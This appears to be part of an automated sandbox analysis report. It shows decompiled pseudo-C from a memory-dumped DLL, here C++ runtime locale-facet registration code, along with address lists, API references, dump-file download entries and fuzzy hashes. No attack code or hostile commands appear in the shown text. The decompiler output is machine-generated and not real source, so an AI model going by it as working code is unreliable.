																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6DDE14EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t946 - 0x20);
																																																										E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t668, _t898, _t920, 0x14);
																																																										E6DDD6653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6de96dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6DDB161C(0x6de96d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t946 - 0x14);
																																																											return E6DDF0075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6DDE1558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t946 - 0x20);
																																																													E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t668, _t899, _t921, 0x14);
																																																													E6DDD6653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6de96e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6DDB161C(0x6de96dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t946 - 0x14);
																																																														return E6DDF0075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6DDE15C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6DDB1438(_t946 - 0x20);
																																																																E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de383cf, _t668, _t900, _t922, 0x14);
																																																																E6DDD6653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6de96dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6DDB161C(0x6de96d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6DDD66BA(_t946 - 0x14);
																																																																	return E6DDF0075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6DDE162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6DDB1438(_t815);
																																																																			E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																																			asm("int3");
																																																																			E6DDF00AC(0x6de3851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6de3c0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6DDE542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6DDF0075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6DDD6FD3(__eflags, _t901);
																																																																			 *0x6de3a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6de96dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t900);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6de96e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t899);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6de96dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t898);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6de96dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t897);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6de96de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t896);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6de96ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t895);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6de96db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t894);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6de96dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t893);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6de96dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t892);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6de96dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t891);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6de96df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t890);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6de96df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6DDD6FD3(__eflags, _t889);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6de96dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6DDD6FD3(__eflags, _t888);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6de96df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6DDD6FD3(__eflags, _t887);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6de96dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6DDD6FD3(__eflags, _t886);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6de96dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6DDD6FD3(__eflags, _t885);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6de96db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6DDD6FD3(__eflags, _t884);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6de96de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6DDD6FD3(__eflags, _t883);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6de96dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6DDD6FD3(__eflags, _t882);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6de96db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6DDD6FD3(__eflags, _t881);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6de96de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

0x6dddef91
0x6dddef91
0x6dddef98
0x6dddefa2
0x6dddefa7
0x6dddefb2
0x6dddefb6
0x6dddefb9
0x6dddefbe
0x6dddefc2
0x6dddefc7
0x6dddefcb
0x6dddf010
0x6dddf013
0x6dddf01f
0x6dddefcd
0x6dddefcf
0x6dddefd5
0x6dddefdb
0x6dddefe3
0x6dddefe6
0x6dddf023
0x6dddf031
0x6dddf036
0x6dddf03e
0x6dddf048
0x6dddf04d
0x6dddf058
0x6dddf05c
0x6dddf05f
0x6dddf064
0x6dddf06d
0x6dddf06f
0x6dddf071
0x6dddf0b6
0x6dddf0b9
0x6dddf0c5
0x6dddf073
0x6dddf073
0x6dddf075
0x6dddf07b
0x6dddf081
0x6dddf089
0x6dddf08c
0x6dddf0c9
0x6dddf0d7
0x6dddf0dc
0x6dddf0e4
0x6dddf0ee
0x6dddf0f3
0x6dddf0fe
0x6dddf102
0x6dddf105
0x6dddf10a
0x6dddf113
0x6dddf115
0x6dddf117
0x6dddf15c
0x6dddf15f
0x6dddf16b
0x6dddf119
0x6dddf119
0x6dddf11b
0x6dddf121
0x6dddf127
0x6dddf12f
0x6dddf132
0x6dddf16f
0x6dddf17d
0x6dddf182
0x6dddf18a
0x6dddf194
0x6dddf199
0x6dddf1a4
0x6dddf1a8
0x6dddf1ab
0x6dddf1b0
0x6dddf1b9
0x6dddf1bb
0x6dddf1bd
0x6dddf202
0x6dddf205
0x6dddf211
0x6dddf1bf
0x6dddf1bf
0x6dddf1c1
0x6dddf1c7
0x6dddf1cd
0x6dddf1d5
0x6dddf1d8
0x6dddf215
0x6dddf223
0x6dddf228
0x6dddf230
0x6dddf23a
0x6dddf23f
0x6dddf24a
0x6dddf24e
0x6dddf251
0x6dddf256
0x6dddf25f
0x6dddf261
0x6dddf263
0x6dddf2a8
0x6dddf2ab
0x6dddf2b7
0x6dddf265
0x6dddf265
0x6dddf267
0x6dddf26d
0x6dddf273
0x6dddf27b
0x6dddf27e
0x6dddf2bb
0x6dddf2c9
0x6dddf2ce
0x6dddf2d6
0x6dddf2e0
0x6dddf2e5
0x6dddf2f0
0x6dddf2f4
0x6dddf2f7
0x6dddf2fc
0x6dddf305
0x6dddf307
0x6dddf309
0x6dddf34e
0x6dddf351
0x6dddf35d
0x6dddf30b
0x6dddf30b
0x6dddf30d
0x6dddf313
0x6dddf319
0x6dddf321
0x6dddf324
0x6dddf361
0x6dddf36f
0x6dddf374
0x6dddf37c
0x6dddf386
0x6dddf38b
0x6dddf396
0x6dddf39a
0x6dddf39d
0x6dddf3a2
0x6dddf3ab
0x6dddf3ad
0x6dddf3af
0x6dddf3f4
0x6dddf3f7
0x6dddf403
0x6dddf3b1
0x6dddf3b1
0x6dddf3b3
0x6dddf3b9
0x6dddf3bf
0x6dddf3c7
0x6dddf3ca
0x6dddf407
0x6dddf415
0x6dddf41a
0x6dddf422
0x6dddf42c
0x6dddf431
0x6dddf43c
0x6dddf440
0x6dddf443
0x6dddf448
0x6dddf451
0x6dddf453
0x6dddf455
0x6dddf49a
0x6dddf49d
0x6dddf4a9
0x6dddf457
0x6dddf457
0x6dddf459
0x6dddf45f
0x6dddf465
0x6dddf46d
0x6dddf470
0x6dddf4ad
0x6dddf4bb
0x6dddf4c0
0x6dddf4c8
0x6dddf4d2
0x6dddf4d7
0x6dddf4e2
0x6dddf4e6
0x6dddf4e9
0x6dddf4ee
0x6dddf4f7
0x6dddf4f9
0x6dddf4fb
0x6dddf540
0x6dddf543
0x6dddf54f
0x6dddf4fd
0x6dddf4fd
0x6dddf4ff
0x6dddf505
0x6dddf50b
0x6dddf513
0x6dddf516
0x6dddf553
0x6dddf561
0x6dddf566
0x6dddf56e
0x6dddf578
0x6dddf57d
0x6dddf588
0x6dddf58c
0x6dddf58f
0x6dddf594
0x6dddf59d
0x6dddf59f
0x6dddf5a1
0x6dddf5e6
0x6dddf5e9
0x6dddf5f5
0x6dddf5a3
0x6dddf5a3
0x6dddf5a5
0x6dddf5ab
0x6dddf5b1
0x6dddf5b9
0x6dddf5bc
0x6dddf5f9
0x6dddf607
0x6dddf60c
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf643
0x6dddf645
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d
0x6dddf280
0x6dddf280
0x6dddf283
0x6dddf287
0x6dddf28b
0x6dddf298
0x6dddf2a0
0x6dddf2a2
0x00000000
0x6dddf2a2
0x6dddf269
0x6dddf269
0x00000000
0x6dddf269
0x6dddf267
0x6dddf1da
0x6dddf1da
0x6dddf1dd
0x6dddf1e1
0x6dddf1e5
0x6dddf1f2
0x6dddf1fa
0x6dddf1fc
0x00000000
0x6dddf1fc
0x6dddf1c3
0x6dddf1c3
0x00000000
0x6dddf1c3
0x6dddf1c1
0x6dddf134
0x6dddf134
0x6dddf137
0x6dddf13b
0x6dddf13f
0x6dddf14c
0x6dddf154
0x6dddf156
0x00000000
0x6dddf156
0x6dddf11d
0x6dddf11d
0x00000000
0x6dddf11d
0x6dddf11b
0x6dddf08e
0x6dddf08e
0x6dddf091
0x6dddf095
0x6dddf099
0x6dddf0a6
0x6dddf0ae
0x6dddf0b0
0x00000000
0x6dddf0b0
0x6dddf077
0x6dddf077
0x00000000
0x6dddf077
0x6dddf075
0x6dddefe8
0x6dddefe8
0x6dddefeb
0x6dddefef
0x6dddeff3
0x6dddf000
0x6dddf008
0x6dddf00a
0x00000000
0x6dddf00a
0x6dddefd1
0x6dddefd1
0x00000000
0x6dddefd1
0x6dddefcf

APIs

__EH_prolog3.LIBCMT ref: 6DDDEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEFA2
int.LIBCPMT ref: 6DDDEFB9

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDEFDC
std::_Facet_Register.LIBCPMT ref: 6DDDEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF031

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 8c422cffc3600418fe50dc559ba1473e0ff07ad5094faccd1cbd9e60ee281d44
Instruction ID: 28f3a08b1220108f47b491c578490e750a962449267921eef35a724bdf6a5aab
Opcode Fuzzy Hash: 8c422cffc3600418fe50dc559ba1473e0ff07ad5094faccd1cbd9e60ee281d44
Instruction Fuzzy Hash: 8E11E575849119DBCF05FB64C840BFDB7B5AF44318F26440AF625AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
